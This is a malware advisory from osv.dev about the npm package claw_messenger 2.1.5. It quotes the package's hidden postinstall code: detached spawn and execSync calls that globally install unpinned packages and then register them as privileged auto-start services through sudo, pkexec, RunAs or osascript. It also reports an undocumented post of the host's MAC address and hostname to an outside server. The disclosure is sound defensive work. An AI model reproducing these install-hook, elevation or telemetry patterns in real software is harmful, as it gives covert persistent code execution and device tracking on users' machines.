claw_messenger @2.1.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4526
Ecosystem
npm
Summary
The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install.

(1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com', ...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally installed package surface to undocumented third-party code that the author, or any future hijacker of that name, can mutate.

(2) An update-silent-service flow loads dist/service-installer.js, which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against the mutable @latest tag; dist/daemon-manager.js then elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec / sudo, and on macOS via osascript ... with administrator privileges.

The combination of an install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger.

Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load. This is undocumented device-tracking telemetry, but it is secondary to the install-time RCE surface.
Source: amazon-inspector (b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f)